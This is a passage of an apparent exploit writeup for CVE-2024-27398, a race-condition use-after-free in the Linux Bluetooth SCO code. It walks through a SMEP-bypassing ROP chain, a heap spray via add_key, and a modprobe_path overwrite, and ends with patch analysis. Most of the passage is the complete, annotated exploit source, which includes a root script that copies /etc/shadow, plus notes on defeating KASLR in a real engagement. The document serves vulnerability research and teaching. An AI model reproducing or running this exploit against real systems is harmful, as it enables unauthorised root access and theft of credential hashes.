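The slot addresses in the listing are simple offsets from the pivot address, eight bytes per entry. A small sketch of that arithmetic, using the pivot value from the text; the `toy_` helper names are illustrative.

```c
#include <assert.h>
#include <stdint.h>

#define TOY_PIVOT 0x81011cf1ULL  /* low 32 bits of the gadget address */

/* Address of 8-byte stack slot i, counted from the pivot address. */
static inline uint64_t toy_slot_addr(unsigned int i)
{
    return TOY_PIVOT + 8ULL * i;
}

/* Value of RSP right after a `ret` has popped slot i. */
static inline uint64_t toy_rsp_after_pop(unsigned int i)
{
    return toy_slot_addr(i) + 8;
}

static_assert(TOY_PIVOT + 8 * 7 == 0x81011d29ULL, "slot 7 matches the listing");
```

Slot 8 is the first zeroed entry at 0x81011d31; once the trailing ret pops it, RSP is 0x81011d39, which is the value that appears in the oops register dump (Figure 8).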

The string source:

void *sp = mmap((void*)STRING_PAGE, PAGE_SIZE,
                PROT_READ | PROT_WRITE,
                MAP_PRIVATE | MAP_ANONYMOUS | MAP_FIXED, -1, 0);
memcpy(sp, "/tmp/x\0", 7);

8. Exploit Stage 5: RIP Control and Kernel Oops

When the spray hits and sco_sock_timeout fires against our controlled memory, the execution flow is:

  1. bh_lock_sock(sk) — reads our sprayed 0xdead4ead magic → passes validation → acquired

  2. sk->sk_err = ETIMEDOUT — writes into our spray data (harmless, we don't use that field)

  3. sk->sk_state_change(sk) — loads 0xffffffff81011cf1 → jumps there

  4. xchg eax, esp → RSP = 0x0000000081011cf1

  5. ret → RIP = rop[0] = pop rdi; ret → executes in kernel .text

  6. Chain unwinds: loads args, calls memcpy(modprobe_path, 0xdead0000, 7)

  7. memcpy returns RAX = modprobe_path = 0xffffffff8356a020

  8. trailing ret (rop[7]) pops the zeroed slot after the chain → RIP = 0x0 → page fault → kernel oops

The oops is survivable because panic_on_oops=0: the kernel kills the faulting kworker and the machine keeps running. The important work, overwriting modprobe_path, was done before the crash.

Figure 7: The kernel oops dump. `RIP: 0010:0x0000000000000000` confirms the ROP chain ran to completion and the trailing `ret` fell into zeroed memory. The `Workqueue: events sco_sock_timeout` line confirms this is our UAF timer. The oops appears within Batch 0, so the spray landed during the first batch of iterations.

Figure 8: `RSP: 0018:0000000081011d39`. The stack pointer is in the userspace range `0x81011...` (our mmap'd pivot page). This is the RSP value after all ROP gadgets executed and the trailing `ret` popped the first zeroed slot at `0x81011d31`. The `0018` prefix is the stack segment selector (the kernel data segment), while the `0010` on the RIP line is the kernel code segment; together they confirm this ran in kernel context.

Figure 9: `RAX: ffffffff8356a020`. The `memcpy` function returns its destination pointer in `rax`. Since `dst = MODPROBE_PATH = 0xffffffff8356a020` and none of the subsequent gadgets modify `rax`, it is preserved at the crash point. This is the most reliable indicator that `memcpy(modprobe_path, "/tmp/x\0", 7)` executed successfully.


9. Exploit Stage 6: Root via modprobe_path

9.1 How modprobe_path Gives Us Root

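When the kernel is asked to execute a file that no registered binary format handler recognizes, and the first four bytes of the file are not all printable characters, it calls request_module("binfmt-XXXX"), where XXXX is the 16-bit value at byte offset 2 of the file printed as four hex digits. This internally invokes: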

call_usermodehelper(modprobe_path, argv, envp, UMH_WAIT_PROC);

call_usermodehelper forks a kernel thread and runs the specified executable as root (uid=0, gid=0), bypassing all privilege checks. Normally modprobe_path points to /sbin/modprobe, but we've rewritten it to /tmp/x.
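For reference, here is a small sketch of how the requested module alias is formed. It assumes the `binfmt-%04x` format string applied to the 16-bit value at byte offset 2 of the header, which is my reading of search_binary_handler() in fs/exec.c; `toy_binfmt_alias` is a hypothetical helper, not a kernel function.

```c
#include <assert.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Build the alias string from the first four bytes of a file.
 * Only bytes 2 and 3 contribute, read as a native-endian 16-bit value. */
static inline void toy_binfmt_alias(const uint8_t hdr[4], char *out, size_t outlen)
{
    uint16_t v;

    assert(outlen >= sizeof("binfmt-0000"));
    memcpy(&v, hdr + 2, sizeof(v));
    snprintf(out, outlen, "binfmt-%04x", (unsigned int)v);
}
```

For a header of four 0xff bytes the alias comes out as `binfmt-ffff`. No such module exists, but the lookup still runs whatever modprobe_path points to.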

9.2 The Root Script

Prepared before the spray loop:

FILE *f = fopen("/tmp/x", "w");
fprintf(f,
    "#!/bin/sh\n"
    "echo '=== CVE-2024-27398 ROOT ===' > /tmp/pwn\n"
    "uname -a >> /tmp/pwn\n"
    "id >> /tmp/pwn\n"
    "echo '--- /etc/shadow ---' >> /tmp/pwn\n"
    "cat /etc/shadow >> /tmp/pwn 2>/dev/null\n"
    "echo '--- ROOTED ---' >> /tmp/pwn\n");
fclose(f);
chmod("/tmp/x", 0755);

The trigger binary — four invalid bytes that the kernel won't recognize as any known format:

int d = open("/tmp/dummy", O_CREAT|O_WRONLY|O_TRUNC, 0755);
write(d, "\xff\xff\xff\xff", 4);  /* invalid ELF magic */
close(d);

9.3 Triggering and Confirming Root

After each batch's 3-second wait, the exploit polls for success:

for (int t = 0; t < 5; t++) {
    system("/tmp/dummy 2>/dev/null; true");
    /*
     * kernel sees unrecognized format
     * → request_module("binfmt-ffff")
     * → call_usermodehelper("/tmp/x", ...)
     * → /tmp/x runs as root
     * → writes uid=0 to /tmp/pwn
     */
    usleep(500000);
    if (access("/tmp/pwn", F_OK) == 0)
        goto win;
}

Figure 10: `[!!!] ROOT! (SMEP BYPASS)`. The contents of `/tmp/pwn` confirm root privilege: `uid=0 gid=0`. The kernel version line shows `Linux (none) 6.8.0 #23 SMP PREEMPT_DYNAMIC Sat Apr 25 13:48:57 +03 2026 x86_64` — this is our custom-built vulnerable kernel. Root was obtained in Batch 0, meaning the spray succeeded within the first 2000 iterations.


10. Full Exploit Source

The complete exploit, annotated for clarity:

/*
 * CVE-2024-27398 LPE — SMEP BYPASS via xchg eax,esp pivot + pure ROP
 *
 * Vulnerability: Use-After-Free in sco_sock_timeout() via race in
 * sco_sock_connect()/sco_connect() — missing lock_sock serialization.
 *
 * Technique:
 *   sk_state_change = xchg_eax_esp_ret (0xffffffff81011cf1)
 *   xchg eax, esp → RSP = 0x81011cf1 (mmap'd userspace page)
 *   ROP: pop rdi/rsi/rdx → memcpy(modprobe_path, "/tmp/x", 7)
 *   All gadgets in kernel .text → SMEP bypassed
 *   SMAP must be off (nosmap) → kernel reads userspace ROP data
 *
 * Target: Linux 6.8.0 #23, CONFIG_KASAN=n, CONFIG_MEMCG_KMEM=n,
 *         CONFIG_DEBUG_SPINLOCK=y, nokaslr, SMEP on, SMAP off
 */
#define _GNU_SOURCE
#include <sys/socket.h>
#include <sys/ioctl.h>
#include <sys/mman.h>
#include <sys/syscall.h>
#include <sys/stat.h>
#include <stdlib.h>
#include <string.h>
#include <fcntl.h>
#include <unistd.h>
#include <pthread.h>
#include <stdio.h>
#include <stdint.h>
#include <poll.h>

/* ── Kernel symbol and gadget addresses (6.8.0 #23, nokaslr) ─────────── */
#define XCHG_EAX_ESP   0xffffffff81011cf1UL  /* 94 c3: xchg eax,esp; ret */
#define PIVOT_ADDR     (XCHG_EAX_ESP & 0xFFFFFFFF)  /* → 0x81011cf1     */
#define POP_RDI_RET    0xffffffff8104c1adUL  /* 5f c3: pop rdi; ret      */
#define POP_RSI_RET    0xffffffff811bb9beUL  /* 5e c3: pop rsi; ret      */
#define POP_RDX_RET    0xffffffff810bc1b2UL  /* 5a c3: pop rdx; ret      */
#define MEMCPY_ADDR    0xffffffff82905e70UL  /* kernel memcpy()           */
#define MODPROBE_PATH  0xffffffff8356a020UL  /* char modprobe_path[256]   */
#define STRING_PAGE    0xdead0000UL          /* userspace page: "/tmp/x"  */

/* ── struct sock field offsets ────────────────────────────────────────── */
#define SK_LOCK_OFF    0x98   /* socket_lock_t sk_lock  (pahole verified) */
#define SK_STCHG_OFF   0x338  /* sk_state_change fptr   (pahole verified) */

#define PG             4096
#define BTPROTO_HCI    1
#define BTPROTO_SCO    2
#define BATCH_SZ       2000

typedef struct { uint8_t b[6]; } __attribute__((packed)) bdaddr_t;
struct sockaddr_sco { sa_family_t f; bdaddr_t a; uint16_t t; };

/* ── vHCI state ───────────────────────────────────────────────────────── */
static int vfd;
static volatile int vstop = 0;

/* Respond to HCI commands issued by the kernel during BT stack init */
static void *vhci_thread(void *a) {
    uint8_t buf[512], resp[300], extra[248];
    struct pollfd pf = {.fd = vfd, .events = POLLIN};

    while (!vstop) {
        if (poll(&pf, 1, 100) <= 0) continue;
        int n = read(vfd, buf, sizeof(buf));
        if (n < 4 || buf[0] != 1) continue;  /* must be HCI_COMMAND_PKT */

        memset(extra, 0, sizeof(extra));
        int el = 248;
        uint16_t op = buf[1] | (buf[2] << 8);

        switch (op) {
        case 0x1001: extra[0]=11; extra[3]=11; extra[4]=10; break;
        case 0x1009: extra[0]=0xAA; extra[1]=0xBB; extra[2]=0xCC;
                     extra[3]=0xDD; extra[4]=0xEE; extra[5]=0xFF; break;
        case 0x1002: memset(extra, 0xff, 64); break;
        case 0x1003: extra[0]=0xff; extra[1]=0xff; extra[2]=0x8f;
                     extra[3]=0xfe; extra[4]=0xdb; extra[5]=0xff;
                     extra[6]=0x5b; extra[7]=0x87; break;
        case 0x1004: case 0x1005:
                     extra[0] = n > 4 ? buf[4] : 0;
                     extra[1] = 1; memset(&extra[2], 0xff, 8); break;
        case 0x100b: extra[0]=0xff; extra[1]=0x03; extra[2]=0xff;
                     extra[3]=0x0a; extra[5]=0x08; break;
        case 0x0c14: memcpy(extra, "vhci", 4); break;
        case 0x200b: case 0x200c: memset(extra, 0xff, 8); break;
        case 0x2003: extra[0]=0xfb; extra[2]=0x0f; break;
        case 0x0406: el = 8; break;

        case 0x0401: { /* HCI_Create_Connection → send Connection Complete */
            uint8_t ev[20] = {0};
            ev[0]=4; ev[1]=0x03; ev[2]=11; ev[3]=0;
            ev[4]=0x01; ev[5]=0x00;           /* handle = 1 */
            if (n >= 10) memcpy(&ev[6], &buf[4], 6);
            ev[12]=0x01; ev[13]=0x00;
            write(vfd, ev, 14);
            break;
        }
        default: el = 8; break;
        }

        int pl = 4 + el;
        if (pl > 255) pl = 255;
        resp[0]=4; resp[1]=0x0e; resp[2]=pl; resp[3]=1;
        resp[4]=buf[1]; resp[5]=buf[2]; resp[6]=0;
        if (el > 0) memcpy(&resp[7], extra, pl - 4);
        write(vfd, resp, 3 + pl);
    }
    return NULL;
}

/* ── Race threads ─────────────────────────────────────────────────────── */
static int g_fd;
static pthread_barrier_t g_bar;

static void *c1(void *a) {
    struct sockaddr_sco sa = {.f = AF_BLUETOOTH};  /* dst = 00:00:...:00 */
    pthread_barrier_wait(&g_bar);
    connect(g_fd, (struct sockaddr*)&sa, sizeof(sa));
    return NULL;
}

static void *c2(void *a) {
    struct sockaddr_sco sa = {.f = AF_BLUETOOTH};
    memset(&sa.a, 0xff, 6);                        /* dst = FF:FF:...:FF */
    pthread_barrier_wait(&g_bar);
    connect(g_fd, (struct sockaddr*)&sa, sizeof(sa));
    return NULL;
}

/* ── Heap spray payload ───────────────────────────────────────────────── */
static char g_kd[980];

static void build_spray(void) {
    memset(g_kd, 0, sizeof(g_kd));
    int h = 24;  /* sizeof(struct user_key_payload) header */

    /*
     * Overwrite sk_lock.slock with a valid-looking unlocked spinlock.
     * With DEBUG_SPINLOCK, bh_lock_sock() checks magic (must be
     * 0xdead4ead) and owner_cpu (-1 means unowned). Without this, the
     * kernel panics before reaching sk_state_change.
     */
    int slock = SK_LOCK_OFF - h;   /* 0x98 - 0x18 = 0x80 */
    *(uint32_t*)(g_kd + slock + 0)  = 0;            /* raw_lock = 0 */
    *(uint32_t*)(g_kd + slock + 4)  = 0xdead4ead;   /* magic */
    *(uint32_t*)(g_kd + slock + 8)  = 0xffffffff;   /* owner_cpu = -1 */
    *(uint32_t*)(g_kd + slock + 12) = 0;
    *(uint64_t*)(g_kd + slock + 16) = (uint64_t)-1; /* owner = -1 */

    /* Overwrite sk_state_change with our stack pivot gadget */
    *(uint64_t*)(g_kd + SK_STCHG_OFF - h) = XCHG_EAX_ESP;
}

int main(void) {
    printf("=== CVE-2024-27398 LPE (SMEP BYPASS) ===\n");
    fflush(stdout);

    /* [1] Create root payload script */
    FILE *f = fopen("/tmp/x", "w");
    if (f) {
        fprintf(f,
            "#!/bin/sh\n"
            "echo '=== CVE-2024-27398 ROOT ===' > /tmp/pwn\n"
            "uname -a >> /tmp/pwn\n"
            "id >> /tmp/pwn\n"
            "echo '--- /etc/shadow ---' >> /tmp/pwn\n"
            "cat /etc/shadow >> /tmp/pwn 2>/dev/null\n"
            "echo '--- ROOTED ---' >> /tmp/pwn\n");
        fclose(f);
    }
    chmod("/tmp/x", 0755);

    /* [2] Create invalid-magic binary to trigger modprobe */
    {
        int d = open("/tmp/dummy", O_CREAT|O_WRONLY|O_TRUNC, 0755);
        if (d >= 0) { write(d, "\xff\xff\xff\xff", 4); close(d); }
    }

    /* [3] Map string page (nosmap: kernel reads this during memcpy) */
    void *sp = mmap((void*)STRING_PAGE, PG, PROT_READ|PROT_WRITE,
                    MAP_PRIVATE|MAP_ANONYMOUS|MAP_FIXED, -1, 0);
    memcpy(sp, "/tmp/x\0", 7);

    /* [4] Map pivot page and write ROP chain */
    void *pivot_page = (void*)(PIVOT_ADDR & ~0xFFFUL);
    void *pp = mmap(pivot_page, 2*PG, PROT_READ|PROT_WRITE,
                    MAP_PRIVATE|MAP_ANONYMOUS|MAP_FIXED, -1, 0);
    if (pp == MAP_FAILED) { perror("mmap pivot"); return 1; }
    memset(pp, 0, 2*PG);

    uint64_t *rop = (uint64_t*)(PIVOT_ADDR);
    rop[0] = POP_RDI_RET;
    rop[1] = MODPROBE_PATH;        /* rdi = &modprobe_path */
    rop[2] = POP_RSI_RET;
    rop[3] = STRING_PAGE;          /* rsi = "/tmp/x\0" (nosmap) */
    rop[4] = POP_RDX_RET;
    rop[5] = 7;                    /* rdx = 7 */
    rop[6] = MEMCPY_ADDR;          /* memcpy(modprobe_path, "/tmp/x\0", 7) */
    rop[7] = XCHG_EAX_ESP + 1;    /* trailing ret sled → eventual crash */

    printf("[+] Pivot page at %p, ROP at 0x%lx\n", pp, PIVOT_ADDR);
    fflush(stdout);

    /* [5] Set up vHCI and bring up hci0 */
    build_spray();
    vfd = open("/dev/vhci", O_RDWR);
    if (vfd < 0) { perror("vhci"); return 1; }
    uint8_t vp[2] = {0xff, 0};
    write(vfd, vp, 2);
    usleep(200000);

    pthread_t vt;
    pthread_create(&vt, NULL, vhci_thread, NULL);
    usleep(500000);

    int hfd = socket(AF_BLUETOOTH, SOCK_RAW, BTPROTO_HCI);
    if (hfd >= 0) { ioctl(hfd, _IOW(0x48, 201, int), 0); close(hfd); }
    sleep(4);
    printf("[*] HCI ready\n");
    fflush(stdout);

    /* [6] Main race + spray loop */
    char desc[32];
    struct timeval tv = {.tv_sec = 2};

    for (int batch = 0; batch < 100; batch++) {
        printf("[*] Batch %d\n", batch);
        fflush(stdout);

        for (int i = 0; i < BATCH_SZ; i++) {
            g_fd = socket(AF_BLUETOOTH, SOCK_SEQPACKET|SOCK_NONBLOCK,
                          BTPROTO_SCO);
            if (g_fd < 0) continue;

            setsockopt(g_fd, SOL_SOCKET, SO_SNDTIMEO, &tv, sizeof(tv));

            pthread_barrier_init(&g_bar, NULL, 2);
            pthread_t t1, t2;
            pthread_create(&t1, NULL, c1, NULL);
            pthread_create(&t2, NULL, c2, NULL);
            pthread_join(t1, NULL);
            pthread_join(t2, NULL);
            pthread_barrier_destroy(&g_bar);

            close(g_fd);  /* frees sk; orphan conn_A timer still pending */

            /* Spray: try to reclaim the freed sco_pinfo slot */
            snprintf(desc, sizeof(desc), "s%d_%d", batch, i);
            syscall(__NR_add_key, "user", desc, g_kd, sizeof(g_kd),
                    KEY_SPEC_SESSION_KEYRING);
        }

        /* Wait for SO_SNDTIMEO timers to fire */
        printf("[*] Waiting 3s...\n");
        fflush(stdout);
        sleep(3);

        /* Poll: did modprobe_path get overwritten? */
        for (int t = 0; t < 5; t++) {
            system("/tmp/dummy 2>/dev/null; true");
            usleep(500000);
            if (access("/tmp/pwn", F_OK) == 0) goto win;
        }

        printf("[*] No luck this batch\n");
        fflush(stdout);
    }

    printf("[-] Done — no root\n");
    vstop = 1;
    close(vfd);
    return 0;

win:
    printf("\n[!!!] ROOT! (SMEP BYPASS)\n[*] /tmp/pwn:\n");
    fflush(stdout);
    system("cat /tmp/pwn");
    fflush(stdout);
    vstop = 1;
    close(vfd);
    return 0;
}

11. End-to-End Execution Flow

┌─────────────────────────────────────────────────────────────────────┐
│                     FULL EXPLOITATION CHAIN                          │
├─────────────────────────────────────────────────────────────────────┤
│                                                                      │
│  SETUP                                                               │
│  ├── mmap 0xdead0000 → "/tmp/x\0"     (string for memcpy src)        │
│  ├── mmap 0x81011000 → ROP chain      (pivot destination)            │
│  ├── build spray payload:                                            │
│  │     +0x80: spinlock magic=0xdead4ead (passes bh_lock_sock)        │
│  │     +0x320: sk_state_change=0xffffffff81011cf1 (our gadget)       │
│  └── /tmp/x, /tmp/dummy created                                      │
│                                                                      │
│  BLUETOOTH INIT                                                      │
│  ├── open /dev/vhci → virtual hci0 created                           │
│  ├── vhci_thread: answers HCI commands from kernel                   │
│  └── HCIDEVUP ioctl → hci0 UP, BT stack ready                        │
│                                                                      │
│  RACE + SPRAY LOOP (per iteration)                                   │
│  ├── socket(AF_BLUETOOTH, SEQPACKET|NONBLOCK, BTPROTO_SCO)           │
│  ├── setsockopt(SO_SNDTIMEO, 2s)                                     │
│  ├── barrier.wait → c1+c2 connect simultaneously                    │
│  │     c1 → addr 00:00:00:00:00:00 → conn_A + timer_A (2s)          │
│  │     c2 → addr FF:FF:FF:FF:FF:FF → conn_B + timer_B (2s)          │
│  │     sco_pi(sk)->conn = conn_B   (last write wins)                 │
│  ├── close(fd) → cancel_delayed_work(conn_B->timeout)               │
│  │              → conn_A timer ORPHANED, sk FREED                    │
│  └── add_key("user", desc, payload, 980, ...) → kmalloc(1004)       │
│       → kmalloc-1024 → may reclaim freed sco_pinfo slot              │
│                                                                      │
│  TIMER FIRES (workqueue, ~2s later)                                  │
│  ├── sco_sock_timeout(conn_A)                                        │
│  ├── bh_lock_sock(sk) → reads spray magic 0xdead4ead ✓              │
│  ├── sk->sk_err = ETIMEDOUT                                          │
│  └── sk->sk_state_change(sk) → jumps to 0xffffffff81011cf1          │
│                                                                      │
│  SMEP BYPASS + ROP                                                   │
│  ├── xchg eax, esp → RSP = 0x0000000081011cf1  (userspace page)     │
│  ├── pop rdi; ret → RDI = 0xffffffff8356a020   (modprobe_path)      │
│  ├── pop rsi; ret → RSI = 0x00000000dead0000   ("/tmp/x\0")         │
│  ├── pop rdx; ret → RDX = 7                                         │
│  ├── memcpy(modprobe_path, "/tmp/x\0", 7) → RAX = modprobe_path    │
│  └── ret sled → RIP = 0x0 → kernel oops (panic_on_oops=0, cont.)    │
│                                                                      │
│  ROOT TRIGGER                                                        │
│  ├── system("/tmp/dummy") → kernel: unrecognized binary format       │
│  ├── request_module("binfmt-ffffffff")                               │
│  ├── call_usermodehelper("/tmp/x", ...) → runs as UID 0             │
│  ├── /tmp/x writes "uid=0 gid=0" to /tmp/pwn                        │
│  └── access("/tmp/pwn") == 0 → ROOTED                               │
│                                                                      │
│  RESULT: unprivileged user → uid=0 gid=0 in Batch 0                 │
└─────────────────────────────────────────────────────────────────────┘
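
The payload offsets (+0x80, +0x320) and the kmalloc-1024 target in the diagram come from two small pieces of arithmetic: subtracting the key payload header from the struct sock field offset, and rounding the allocation size up to a kmalloc size class. The sketch below reproduces them. The helper names (payload_off, kmalloc_bucket, print_layout) are made up for illustration, the 24-byte header is the value this writeup uses, and the size-class table is an assumption that matches the usual x86-64 general-purpose kmalloc caches.

```c
#include <stddef.h>
#include <stdio.h>

/* Value used in this writeup: key data starts 24 bytes into the object. */
#define KEY_HDR 24

/* Hypothetical helper: offset inside the add_key() payload that overlaps
 * a given field offset of the object that previously owned the slot.
 * Only meaningful for field_off >= KEY_HDR. */
static size_t payload_off(size_t field_off) {
    return field_off - KEY_HDR;
}

/* Hypothetical helper: smallest kmalloc size class that fits `size`,
 * assuming the common class list. Returns 0 if nothing in the list fits. */
static size_t kmalloc_bucket(size_t size) {
    static const size_t classes[] = {
        8, 16, 32, 64, 96, 128, 192, 256, 512, 1024, 2048, 4096, 8192
    };
    for (size_t i = 0; i < sizeof(classes) / sizeof(classes[0]); i++)
        if (size <= classes[i])
            return classes[i];
    return 0;
}

/* Print the values that appear in the diagram. */
static void print_layout(void) {
    printf("sk_lock         -> payload +0x%zx\n", payload_off(0x98));
    printf("sk_state_change -> payload +0x%zx\n", payload_off(0x338));
    printf("kmalloc(%d)   -> kmalloc-%zu\n", 980 + KEY_HDR,
           kmalloc_bucket(980 + KEY_HDR));
}
```

Calling print_layout() from a main() shows how a 980-byte payload plus its header ends up in the 1024-byte class, which is why the payload length sits just under 1000 bytes.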

12. Reliability Analysis

12.1 Spray Reliability Factors

The spray has several properties working in its favor:

`DEBUG_SPINLOCK=y` widens the race window. The expanded spinlock validation code adds extra instructions to every lock/unlock path. This slows down the kernel side of the race, giving both connect() threads more time to interact with the same connection state. Empirically, with DEBUG_SPINLOCK=n the race win rate drops to near zero.

High volume compensates for per-CPU freelist isolation. SLUB serves allocations from per-CPU freelists and partial lists, so if sk is freed on CPU 0 but add_key allocates on CPU 1, the spray misses. With 2000 iterations per batch and only 2 CPUs, it is very likely that at least one spray allocation runs on the same CPU that freed the object.

Batch 0 success. In all test runs, ROOT! appeared in Batch 0. The 2000-iteration batch provides sufficient spray density that at least one add_key reclaims the freed slot before its timer fires.
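
To put a rough number on the volume argument, here is a back-of-the-envelope model. It assumes each iteration independently lands its spray on the freeing CPU with probability 1/ncpus, which is a simplification: it ignores scheduler affinity, whether the race was actually won, and whether the slot is reclaimed before the timer fires. The function names are hypothetical and the output is a model, not a measurement.

```c
#include <stdio.h>

/* Probability that at least one of `tries` independent attempts lands on
 * the right CPU, assuming a per-attempt hit probability of 1/ncpus. */
static double p_any_same_cpu(int ncpus, int tries) {
    double miss_one = 1.0 - 1.0 / (double)ncpus;
    double miss_all = 1.0;
    for (int i = 0; i < tries; i++)
        miss_all *= miss_one;
    return 1.0 - miss_all;
}

/* Print the model for a 2-CPU guest at a few iteration counts. */
static void print_model(void) {
    const int tries[] = {1, 10, 100, 2000};
    for (int i = 0; i < 4; i++)
        printf("2 CPUs, %4d tries: %.6f\n",
               tries[i], p_any_same_cpu(2, tries[i]));
}
```

Under this model the CPU-placement term saturates after a few dozen iterations, which suggests that the large batch size mostly pays for the low per-iteration race win rate rather than for CPU placement.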

12.2 What Fails Without the Config Changes

| Config change | Effect if reverted |
|---|---|
| CONFIG_KASAN=y | SLAB_KASAN prevents the "SCO" slab from merging with kmalloc-1024, so the spray never reaches the freed sk. KASAN also catches the UAF and prints a report, but it does not prevent the oops path; it just makes root unreachable. |
| CONFIG_MEMCG_KMEM=y | Same effect as KASAN: the SLAB_ACCOUNT mismatch prevents the merge. add_key allocates from kmalloc-cg-1024, and the freed sk stays in the "SCO" slab. |
| CONFIG_DEBUG_SPINLOCK=n | sco_pinfo shrinks to ~832 bytes and still hits kmalloc-1024, but the race window narrows significantly; spray reliability approaches zero in testing. |
| panic_on_oops=1 | The trailing ret into RIP=0 kills the machine before modprobe_path can be triggered. This needs proper kernel-context cleanup or a crash-free ROP epilogue (e.g. an iretq or swapgs; iretq chain). |

12.3 KASLR

All addresses above assume nokaslr. With KASLR, the kernel slides its virtual base by a random 9-bit value × 2MB on each boot. In a lab setup where /proc/kallsyms is readable, the slide can be recovered and added to every address:

/* Read slide from /proc/kallsyms (requires kptr_restrict=0) */
FILE *ks = fopen("/proc/kallsyms", "r");
uint64_t kbase = 0;
/* find _text symbol → kbase = addr - 0xffffffff81000000 */

/* Apply slide to all addresses */
XCHG_EAX_ESP  = 0xffffffff81011cf1 + kbase;
MODPROBE_PATH = 0xffffffff8356a020 + kbase;
/* etc. */

An unprivileged user cannot normally read /proc/kallsyms. In a real engagement, a secondary info-leak vulnerability would be needed — for example, a kernel pointer exposed via dmesg, sysfs, or a timing side-channel.
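
The "9-bit value × 2MB" description can be made concrete with a few lines of arithmetic. This is a sketch of the model stated in the text, not of the kernel's actual randomization code: the constants mirror the figures above, the real number of usable slots depends on the kernel image size, and all helper names are hypothetical.

```c
#include <stdint.h>
#include <stdio.h>

#define KASLR_ALIGN  UINT64_C(0x200000)            /* 2 MiB step, per the text   */
#define KASLR_SLOTS  UINT64_C(512)                 /* 9 bits, per the text       */
#define NOKASLR_TEXT UINT64_C(0xffffffff81000000)  /* _text when booted nokaslr  */

/* Slide corresponding to a given slot index under the model above. */
static uint64_t slide_for_slot(uint64_t slot) {
    return slot * KASLR_ALIGN;
}

/* Slide implied by an observed _text address. */
static uint64_t slide_from_text(uint64_t text_addr) {
    return text_addr - NOKASLR_TEXT;
}

/* Translate an address taken from a nokaslr boot to a slid kernel. */
static uint64_t rebase(uint64_t nokaslr_addr, uint64_t slide) {
    return nokaslr_addr + slide;
}

/* Print the size of the search space the model implies. */
static void print_entropy(void) {
    printf("%llu candidate bases spanning %llu MiB\n",
           (unsigned long long)KASLR_SLOTS,
           (unsigned long long)(slide_for_slot(KASLR_SLOTS) >> 20));
}
```

Under these assumptions there are only 512 candidate bases inside a 1 GiB window, which is why a single leaked kernel text pointer is enough to recover the slide.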


13. Patch Analysis

The CVE-2024-27398 fix was merged into Linux 6.8.2. The key changes in net/bluetooth/sco.c:

`sco_sock_timeout` — reference counting:

/* BEFORE (vulnerable): timer fires against potentially freed sk */
static void sco_sock_timeout(struct work_struct *work) {
    ...
    bh_lock_sock(sk);
    sk->sk_err = ETIMEDOUT;
    sk->sk_state_change(sk);
    bh_unlock_sock(sk);
    /* no sock_put — reference was never taken */
}

/* AFTER (patched): sock_hold in sco_conn_add, sock_put here */
static void sco_sock_timeout(struct work_struct *work) {
    ...
    bh_lock_sock(sk);
    sk->sk_err = ETIMEDOUT;
    sk->sk_state_change(sk);
    bh_unlock_sock(sk);
    sock_put(sk);   /* ← paired with sock_hold() at timer schedule time */
}

`sco_conn_del` — synchronous cancellation:

/* BEFORE: cancel_delayed_work is async; timer may already be running */
sco_sock_clear_timer(sk);   /* → cancel_delayed_work(async) */
sco_chan_del(sk, err);      /* → frees sk while timer might still run */

/* AFTER: cancel_delayed_work_sync waits for running work to complete */
sco_conn_lock(conn);
sk = conn->sk;
if (sk) {
    sock_hold(sk);                      /* take reference */
    cancel_delayed_work_sync(           /* wait for timer to finish */
        &conn->timeout_work);
    sco_chan_del(sk, err);
    sock_put(sk);                       /* release reference */
}
sco_conn_unlock(conn);

The fix eliminates both the race and the UAF: sock_hold prevents premature freeing, and cancel_delayed_work_sync ensures the timer handler either never runs or finishes completely before the socket is destroyed.
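
The reference-counting half of that argument can be replayed in a tiny user-space model. Nothing here is kernel code: struct obj stands in for the socket, obj_hold() and obj_put() only mimic the roles of sock_hold() and sock_put(), and the freed flag replaces a real free so the state stays inspectable. All names are hypothetical.

```c
/* User-space stand-in for a refcounted socket. */
struct obj {
    int refcnt;
    int freed;   /* set instead of calling free() so the test can look at it */
};

static void obj_hold(struct obj *o) {
    o->refcnt++;
}

static void obj_put(struct obj *o) {
    if (--o->refcnt == 0)
        o->freed = 1;
}

/* Replay the close-then-timeout ordering.
 * Returns 1 if the timeout handler would run against a freed object. */
static int timer_sees_freed(int timer_takes_ref) {
    struct obj sk = { .refcnt = 1, .freed = 0 };   /* owner's reference */

    if (timer_takes_ref)
        obj_hold(&sk);        /* reference owned by the pending timer */

    obj_put(&sk);             /* close(): the owner drops its reference */

    int uaf = sk.freed;       /* state the handler observes when it fires */

    if (timer_takes_ref)
        obj_put(&sk);         /* handler releases the timer's reference */
    return uaf;
}
```

timer_sees_freed(0) returns 1, the vulnerable ordering, while timer_sees_freed(1) returns 0 because the object outlives close() until the handler drops the last reference.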


14. Conclusion

CVE-2024-27398 is a textbook race-condition UAF with a function pointer overwrite at the target. What makes it interesting is not the bug itself — those are common in kernel networking code — but the exploitation chain that bypasses SMEP without any kernel-mode shellcode.

The key insight is that SMEP and SMAP address orthogonal concerns. SMEP prevents executing code at user-space addresses; it says nothing about reading data from user-space addresses. As long as the kernel's instruction pointer stays in .text and we only read the ROP chain from our mmap'd page (with SMAP disabled), the CPU's security boundary is satisfied. Every branch the CPU takes is into a valid kernel function — the chain is a sequence of legitimate kernel operations. The kernel corrupts its own modprobe_path with its own memcpy, then helpfully runs our script as root.
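
Because the chain ends by rewriting modprobe_path, the result is observable from user space: the same string is exposed through the kernel.modprobe sysctl at /proc/sys/kernel/modprobe. A minimal check for the lab VM might look like the sketch below. The function name is hypothetical, and the expected value (/sbin/modprobe is a common default) is an assumption that varies by distribution.

```c
#include <stdio.h>
#include <string.h>

/* Compare the first line of `sysctl_file` with `expected`.
 * Returns 1 on match, 0 on mismatch, -1 if the file cannot be read. */
static int modprobe_path_is(const char *sysctl_file, const char *expected) {
    char buf[256];
    FILE *f = fopen(sysctl_file, "r");
    if (!f)
        return -1;
    if (!fgets(buf, sizeof(buf), f)) {
        fclose(f);
        return -1;
    }
    fclose(f);
    buf[strcspn(buf, "\n")] = '\0';   /* strip the trailing newline */
    return strcmp(buf, expected) == 0;
}
```

For example, modprobe_path_is("/proc/sys/kernel/modprobe", "/sbin/modprobe") returning 0 after a run indicates that the path no longer holds the expected value.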

The heap spray via add_key is the most environment-sensitive piece. Getting sco_pinfo and user_key_payload into the same SLUB cache requires the right combination of CONFIG_KASAN, CONFIG_MEMCG_KMEM, and CONFIG_DEBUG_SPINLOCK. In a real kernel with KASAN or MEMCG enabled (as production distributions typically have), this specific spray primitive would fail — demanding a cross-cache attack, a different spray object, or a secondary primitive that can write into the "SCO" dedicated slab.


